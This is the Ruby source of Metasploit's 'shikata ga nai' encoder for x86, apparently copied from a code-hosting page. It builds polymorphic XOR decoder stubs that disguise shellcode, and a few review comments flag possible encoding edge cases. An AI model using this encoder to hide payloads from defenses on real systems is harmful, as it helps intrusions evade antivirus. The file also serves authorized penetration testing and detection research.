Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x86/shikata_ga_nai.rb
Views: 11780
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/poly'

#
# Polymorphic XOR additive feedback encoder for x86 ("shikata ga nai").
#
# The decoder stub is assembled from Rex::Poly logical blocks whose
# instruction permutations, ordering and registers are chosen at generation
# time.
#
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback

  # The shikata encoder has an excellent ranking because it is polymorphic.
  # Party time, excellent!
  Rank = ExcellentRanking

  #
  # Registers the encoder metadata: a 4-byte key operating on 4-byte blocks.
  #
  def initialize
    super(
      'Name'        => 'Polymorphic XOR Additive Feedback Encoder',
      'Description' => %q{
        This encoder implements a polymorphic XOR additive feedback encoder.
        The decoder stub is generated based on dynamic instruction
        substitution and dynamic block ordering. Registers are also
        selected dynamically.
      },
      'Author'      => 'spoonm',
      'Arch'        => ARCH_X86,
      'License'     => MSF_LICENSE,
      'Decoder'     =>
        {
          'KeySize'   => 4,
          'BlockSize' => 4
        })
  end

  #
  # Generates the shikata decoder stub.
  #
  # The stub is generated once per encoder state and cached on the state, so
  # repeated calls return the same stub. As a side effect of the first call,
  # state.decoder_key_offset is set and the trailing +cutoff+ bytes of the
  # stub are moved to the front of state.buf.
  #
  # @param state the encoder state (reads buf/badchars/context_encoding,
  #   writes decoder_key_offset/buf/decoder_stub)
  # @return the cached decoder stub
  # @raise [BadGenerateError] if a saved register is one this encoder always
  #   modifies, or if no block could be generated
  #
  def decoder_stub(state)
    # If the decoder stub has not already been generated for this state, do
    # it now. The decoder stub method may be called more than once.
    if state.decoder_stub.nil?
      # Sanity check that saved_registers doesn't overlap with modified_registers
      raise BadGenerateError unless (modified_registers & saved_registers).empty?

      # Shikata will only cut off the last 1-4 bytes of its own end
      # depending on the alignment of the original buffer
      cutoff = 4 - (state.buf.length & 3)
      block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)

      # Set the state specific key offset to wherever the XORK ended up.
      state.decoder_key_offset = block.index('XORK')

      # Take the last 1-4 bytes of shikata and prepend them to the buffer
      # that is going to be encoded to make it align on a 4-byte boundary.
      state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf

      # Cache this decoder stub. The reason we cache the decoder stub is
      # because we need to ensure that the same stub is returned every time
      # for a given encoder state.
      state.decoder_stub = block
    end

    state.decoder_stub
  end

  # Indicate that this module can preserve some registers
  def can_preserve_registers?
    true
  end

  # A list of registers always touched by this encoder
  def modified_registers
    # ESP is assumed and is handled through preserves_stack?
    [
      # The counter register is hardcoded
      Rex::Arch::X86::ECX,
      # These are modified by div and mul operations
      Rex::Arch::X86::EAX, Rex::Arch::X86::EDX
    ]
  end

  # Always blacklist these registers in our block generation
  def block_generator_register_blacklist
    [Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers
  end

  protected

  #
  # Returns the set of FPU instructions that can be used for the FPU block of
  # the decoder stub.
  #
  # @return [Array<String>] two-byte opcode strings
  #
  def fpu_instructions
    fpus = []

    0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
    0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }

    fpus << "\xd9\xd0"
    fpus << "\xd9\xe1"
    fpus << "\xd9\xf6"
    fpus << "\xd9\xf7"
    fpus << "\xd9\xe5"

    # This FPU instruction seems to fail consistently on Linux
    #fpus << "\xdb\xe1"

    fpus
  end

  #
  # Returns a polymorphic decoder stub that is capable of decoding a buffer
  # of the supplied length and encodes the last cutoff bytes of itself.
  #
  # @param state the encoder state (context_encoding and badchars are read)
  # @param length [Integer] number of bytes the stub has to decode
  # @param cutoff [Integer] number of trailing stub bytes that are themselves
  #   encoded
  # @return the result of generating the 'loop_inst' block and its
  #   dependencies
  # @raise [EncodingError] if BufferOffset cannot be encoded NULL-free, or if
  #   the block generator fails
  #
  def generate_shikata_block(state, length, cutoff)
    # Declare logical registers
    # NOTE(review): count_reg is never referenced below (ECX is hardcoded in
    # the opcodes); kept in case constructing it matters to Rex::Poly.
    count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
    addr_reg  = Rex::Poly::LogicalRegister::X86.new('addr')

    # Context encoding loads the key with the EAX-only moffs form of mov, so
    # the key register is pinned to EAX in that case.
    key_reg =
      if state.context_encoding
        Rex::Poly::LogicalRegister::X86.new('key', 'eax')
      else
        Rex::Poly::LogicalRegister::X86.new('key')
      end

    # Declare individual blocks
    endb = Rex::Poly::SymbolicBlock::End.new

    # Clear the counter register
    clear_register = Rex::Poly::LogicalBlock.new('clear_register',
      "\x31\xc9",  # xor ecx,ecx
      "\x29\xc9",  # sub ecx,ecx
      "\x33\xc9",  # xor ecx,ecx
      "\x2b\xc9")  # sub ecx,ecx

    # Initialize the counter after zeroing it
    init_counter = Rex::Poly::LogicalBlock.new('init_counter')

    # Divide the length by four but ensure that it aligns on a block size
    # boundary (4 byte). The padding term is 0..3: it only rounds the length
    # up to the next multiple of four.
    length += (4 - (length & 3)) & 3
    length /= 4

    if length <= 0xff
      # mov cl, imm8
      init_counter.add_perm("\xb1" + [ length ].pack('C'))
    elsif length <= 0xffff
      # mov cx, imm16 -- 0xffff is the largest count that fits; 65536 would
      # pack as "\x00\x00" and load a zero counter.
      init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
    else
      # mov ecx, imm32
      init_counter.add_perm("\xb9" + [ length ].pack('V'))
    end

    # Key initialization block. 'XORK' is a placeholder whose position is
    # later located by decoder_stub via block.index('XORK').
    init_key =
      if state.context_encoding
        # If using context encoding, we use a mov reg, [addr]
        Rex::Poly::LogicalBlock.new('init_key',
          Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK' })
      else
        # Otherwise, we do a direct mov reg, val
        Rex::Poly::LogicalBlock.new('init_key',
          Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK' })
      end

    # xor [addr_reg + disp8], key_reg / add key_reg, [addr_reg + disp8];
    # the disp8 byte is appended by the xor1/xor2/add1/add2 procs below.
    xor = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
    add = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }

    # Two equivalent ways of advancing the address register by four bytes
    sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
    add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }

    if datastore["BufferRegister"]
      buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])
      offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)
      if (offset < -255 || offset > 255) && state.badchars.include?("\x00")
        raise EncodingError, "Can't generate NULL-free decoder with a BufferOffset bigger than one byte"
      end

      mov = Proc.new { |b|
        # mov addr_reg, buff_reg (opcode 89 /r: r/m = addr_reg, reg = buff_reg)
        "\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
      }
      add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }
      sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }

      getpc = Rex::Poly::LogicalBlock.new('getpc')
      getpc.add_perm(Proc.new { |b| mov.call(b) + add_offset.call(b) })
      getpc.add_perm(Proc.new { |b| mov.call(b) + sub_offset.call(b) })

      # With an offset of less than four, inc is smaller than or the same size as add
      if offset > 0 && offset < 4
        getpc.add_perm(Proc.new { |b| mov.call(b) + inc(b.regnum_of(addr_reg)) * offset })
      elsif offset < 0 && offset > -4
        getpc.add_perm(Proc.new { |b| mov.call(b) + dec(b.regnum_of(addr_reg)) * (-offset) })
      end

      # NOTE: Adding a perm with possibly different sizes is normally
      # wrong since it will change the SymbolicBlock::End offset during
      # various stages of generation. In this case, though, offset is
      # constant throughout the whole process, so it isn't a problem.
      #
      # NOTE(review): the ModRM bytes below use buff_reg directly as r/m.
      # On x86, r/m = ESP requires a SIB byte and mod=00 with r/m = EBP means
      # "disp32, no base", so this permutation looks unsafe for those buffer
      # registers -- confirm before relying on it with ESP/EBP.
      getpc.add_perm(Proc.new { |b|
        modrm = b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))
        if offset == 0
          # lea addr_reg, [buff_reg]
          "\x8d" + modrm.chr
        elsif offset.between?(-128, 127)
          # lea addr_reg, [buff_reg + byte offset]
          # disp8 is sign-extended, so only -128..127 can use this form.
          "\x8d" + (0x40 + modrm).chr + [offset].pack('c')
        else
          # lea addr_reg, [buff_reg + DWORD offset]
          # NOTE: This can generate NULL bytes (e.g. small positive offsets)!
          "\x8d" + (0x80 + modrm).chr + [offset].pack('V')
        end
      })

      # BufferReg+BufferOffset points right at the beginning of our
      # buffer, so in contrast to the fnstenv technique, we don't have to
      # sub off any other offsets.
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
    else
      # FPU blocks
      fpu = Rex::Poly::LogicalBlock.new('fpu',
        *fpu_instructions)

      # fnstenv [esp-0xc]
      fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
        "\xd9\x74\x24\xf4")
      fnstenv.depends_on(fpu)

      # Get EIP off the stack (pop addr_reg)
      getpc = Rex::Poly::LogicalBlock.new('getpc',
        Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
      getpc.depends_on(fnstenv)

      # Subtract the offset of the fpu instruction since that's where eip points after fnstenv
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
    end

    # Decoder loop block. The *2 variants are used whenever the address
    # register has already been advanced by four earlier in the permutation.
    loop_block = Rex::Poly::LogicalBlock.new('loop_block')

    loop_block.add_perm(
      Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
      Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
      Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
      Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
      Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
      Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })

    # Loop instruction block
    loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
      "\xe2\xf5")
      # In the current implementation the loop block is a constant size,
      # so really no need for a fancy calculation. Nevertheless, here's
      # one way to do it:
      #Proc.new { |b|
      #  # loop <loop_block label>
      #  # -2 to account for the size of this instruction
      #  "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
      #})

    # Define block dependencies
    clear_register.depends_on(getpc)
    init_counter.depends_on(clear_register)
    loop_block.depends_on(init_counter, init_key)
    loop_inst.depends_on(loop_block)

    begin
      # Generate a permutation saving the ECX, ESP, and user defined registers
      loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
    rescue RuntimeError, EncodingError => e
      # The Rex::Poly block generator can raise RuntimeError variants
      raise EncodingError, e.to_s
    end
  end

  # Convert the SaveRegisters to an array of x86 register constants
  def saved_registers
    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
  end

  #
  # Encodes "sub <reg>, imm".
  #
  # The short form (83 /5 ib) sign-extends its 8-bit immediate, so it is only
  # used for -128..127; everything else gets the 32-bit form (81 /5 id).
  #
  # @param regnum [Integer] x86 register number
  # @param imm [Integer, nil] value to subtract
  # @return [String] the instruction bytes, or "" when imm is nil or zero
  #
  def sub_immediate(regnum, imm)
    return "" if imm.nil? || imm == 0

    if imm.between?(-128, 127)
      "\x83" + (0xe8 + regnum).chr + [imm].pack('c')
    else
      "\x81" + (0xe8 + regnum).chr + [imm].pack('V')
    end
  end

  #
  # Encodes "add <reg>, imm".
  #
  # The short form (83 /0 ib) sign-extends its 8-bit immediate, so it is only
  # used for -128..127; everything else gets the 32-bit form (81 /0 id).
  #
  # @param regnum [Integer] x86 register number
  # @param imm [Integer, nil] value to add
  # @return [String] the instruction bytes, or "" when imm is nil or zero
  #
  def add_immediate(regnum, imm)
    return "" if imm.nil? || imm == 0

    if imm.between?(-128, 127)
      "\x83" + (0xc0 + regnum).chr + [imm].pack('c')
    else
      "\x81" + (0xc0 + regnum).chr + [imm].pack('V')
    end
  end

  # Encodes the one-byte "inc <reg>" (opcode 0x40 + register number).
  def inc(regnum)
    [0x40 + regnum].pack('C')
  end

  # Encodes the one-byte "dec <reg>" (opcode 0x48 + register number).
  def dec(regnum)
    [0x48 + regnum].pack('C')
  end
end